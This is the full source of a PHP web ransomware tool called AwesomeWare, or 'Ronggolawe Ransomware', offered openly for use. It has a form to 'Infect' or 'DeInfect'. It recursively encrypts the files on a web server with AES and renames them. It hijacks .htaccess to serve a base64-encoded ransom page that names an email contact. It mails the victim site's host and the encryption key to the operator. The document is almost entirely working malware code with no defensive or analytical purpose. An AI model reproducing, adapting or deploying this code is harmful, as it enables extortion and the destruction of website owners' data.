Rasonware PHP

1. <!DOCTYPE html>
2. <html>
3. <head>
4. <title>AwesomeWare</title>
5. <style type="text/css">
6. body {
7. background: #1A1C1F;
8. color: #e2e2e2;
9. }
10. .inpute{
11. border-style: dotted;
12. border-color: #379600;
13. background-color: transparent;
14. color: white;
15. text-align: center;
16. }
17. .selecte{
18. border-style: dotted;
19. border-color: green;
20. background-color: transparent;
21. color: green;
22. }
23. .submite{
24. border-style: dotted;
25. border-color: #4CAF50;
26. background-color: transparent;
27. color: white;
28. }
29. .result{
30. text-align: left;
31. }
32. </style>
33. <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
34. </head>
35. <body>
36. <div class="result">
37. <?php
38. error_reporting(0);
39. set_time_limit(0);
40. ini_set('memory_limit', '-1');
41. class deRanSomeware
42. {
43. public function shcpackInstall(){
44. if(!file_exists(".htashor7cut")){
45. rename(".htaccess", ".htashor7cut");
46. if(fwrite(fopen('.htaccess', 'w'), "#Bug7sec Team\r\nDirectoryIndex shor7cut.php\r\nErrorDocument 404 /shor7cut.php")){
47. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
48. }
49. if(file_put_contents("shor7cut.php", base64_decode("PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KICAgPHRpdGxlPkF3ZXNvbWVXYXJlPC90aXRsZT4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCiAgICBiYWNrZ3JvdW5kOiAjMUExQzFGOw0KICAgIGNvbG9yOiAjZTJlMmUyOw0KfQ0KYXsNCiAgIGNvbG9yOmdyZWVuOw0KfQ0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGNlbnRlcj4NCjxwcmU+DQogICAgICANCiAgICAgICAgICAgIC4tIiItLg0KICAgICAgICAgICAvIC4tLS4gXA0KICAgICAgICAgIC8gLyAgICBcIFwNCiAgICAgICAgICB8IHwgICAgfCB8DQogICAgICAgICAgfCB8Li0iIi0ufA0KICAgICAgICAgLy8vYC46Ojo6LmBcDQogICAgICAgIHx8fCA6Oi8gIFw6OiA7DQogICAgICAgIHx8OyA6OlxfXy86OiA7DQogICAgICAgICBcXFwgJzo6OjonIC8NCiAgICAgICAgICBgPSc6LS4uLSdgDQpZb3VyIHNpdGUgaXMgbG9ja2VkLCBwbGVhc2UgY29udGFjdCB2aWEgZW1haWw6DQogICAgIC1bIDxmb250IGNvbG9yPSJncmVlbiI+dG8xMzM3ZGF5W2F0XWdtYWlsLmNvbTwvZm9udD4gXS0NCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NClRoaXMgaXMgYSBub3RpY2Ugb2YgPGEgaHJlZj0iaHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUmFuc29td2FyZSI+cmFuc29td2FyZTwvYT4uPGJyPg0KSG93IHRvIHJlc3RvcmUgdGhlIGJlZ2lubmluZz8NClBsZWFzZSBjb250YWN0IHVzIHZpYSBlbWFpbCBsaXN0ZWQNCjwvcHJlPg0KPC9jZW50ZXI+DQo8L2JvZHk+DQo8L2h0bWw+"))){
50. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> shor7cut.php (Default Page)<br>';
51. }
52. }
53. }
54. public function shcpackUnstall(){
55.  
56. if( file_exists(".htashor7cut") ){
57. if( unlink(".htaccess") && unlink("shor7cut.php") ){
58. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>';
59. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> shor7cut.php (Default Page)<br>';
60. }
61. rename(".htashor7cut", ".htaccess");
62. }
63.  
64. }
65.  
66. public function plus(){
67. flush();
68. ob_flush();
69. }
70. public function locate(){
71. return getcwd();
72. }
73. public function shcdirs($dir,$method,$key){
74. switch ($method) {
75. case '1':
76. deRanSomeware::shcpackInstall();
77. break;
78. case '2':
79. deRanSomeware::shcpackUnstall();
80. break;
81. }
82. foreach(scandir($dir) as $d)
83. {
84. if($d!='.' && $d!='..')
85. {
86. $locate = $dir.DIRECTORY_SEPARATOR.$d;
87. if(!is_dir($locate)){
88. if( deRanSomeware::kecuali($locate,"AwesomeWare.php") && deRanSomeware::kecuali($locate,".png") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"shor7cut.php") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,".htashor7cut") ){
89. switch ($method) {
90. case '1':
91. deRanSomeware::shcEnCry($key,$locate);
92. deRanSomeware::shcEnDesDirS($locate,"1");
93. break;
94. case '2':
95. deRanSomeware::shcDeCry($key,$locate);
96. deRanSomeware::shcEnDesDirS($locate,"2");
97. break;
98. }
99. }
100. }else{
101. deRanSomeware::shcdirs($locate,$method,$key);
102. }
103. }
104. deRanSomeware::plus();
105. }
106. deRanSomeware::report($key);
107. }
108.  
109. public function report($key){
110. $message.= "========= Ronggolawe Ransomware =========\n";
111. $message.= "Website : ".$_SERVER['HTTP_HOST'];
112. $message.= "Key : ".$key;
113. $message.= "========= Ronggolawe (2016) Ransomware =========\n";
114. $subject = "Report Ransomeware";
115. $headers = "From: Ransomware <[email protected]>\r\n";
116. mail("-- YOUR EMAIL --",$subject,$message,$headers);
117. }
118.  
119. public function shcEnDesDirS($locate,$method){
120. switch ($method) {
121. case '1':
122. rename($locate, $locate.".shor7cut");
123. break;
124. case '2':
125. $locates = str_replace(".shor7cut", "", $locate);
126. rename($locate, $locates);
127. break;
128. }
129. }
130.  
131. public function shcEnCry($key,$locate){
132. $data = file_get_contents($locate);
133. $iv = mcrypt_create_iv(
134. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
135. MCRYPT_DEV_URANDOM
136. );
137.  
138. $encrypted = base64_encode(
139. $iv .
140. mcrypt_encrypt(
141. MCRYPT_RIJNDAEL_128,
142. hash('sha256', $key, true),
143. $data,
144. MCRYPT_MODE_CBC,
145. $iv
146. )
147. );
148. if(file_put_contents($locate, $encrypted )){
149. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
150. }else{
151. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> '.$locate.' <br>';
152. }
153. }
154.  
155. public function shcDeCry($key,$locate){
156. $data = base64_decode( file_get_contents($locate) );
157. $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
158.  
159. $decrypted = rtrim(
160. mcrypt_decrypt(
161. MCRYPT_RIJNDAEL_128,
162. hash('sha256', $key, true),
163. substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
164. MCRYPT_MODE_CBC,
165. $iv
166. ),
167. "\0"
168. );
169. if(file_put_contents($locate, $decrypted )){
170. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
171. }else{
172. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">'.$locate.'</font> <br>';
173. }
174. }
175.  
176.  
177.  
178. public function kecuali($ext,$name){
179. $re = "/({$name})/";
180. preg_match($re, $ext, $matches);
181. if($matches[1]){
182. return false;
183. }
184. return true;
185. }
186. }
187.  
188. if($_POST['submit']){
189. switch ($_POST['method']) {
190. case '1':
191. deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST['key']);
192. break;
193. case '2':
194. deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST['key']);
195. break;
196. }
197. }else{
198. ?>
199. <center>
200. <pre>
201.  
202. .-""-.
203. / .--. \
204. / / \ \
205. | | | |
206. | |.-""-.|
207. ///`.::::.`\
208. ||| ::/ \:: ;
209. ||; ::\__/:: ;
210. \\\ '::::' /
211. SHC `=':-..-'`
212. AwesomeWare
213. -[ Contact : to1337day[at]gmail.com ]-
214. </pre>
215. <form action="" method="post" style=" text-align: center;">
216. <label>Key : </label>
217. <input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC">
218. <select name="method" class="selecte">
219. <option value="1">Infection</option>
220. <option value="2">DeInfection</option>
221. </select>
222. <input type="submit" name="submit" class="submite" value="Submit" />
223. </form>
224. <?php
225. }?>
226. </div>
227. </body>
228. </html>
229.  
230.  
231. <?php
232.  
233. ?>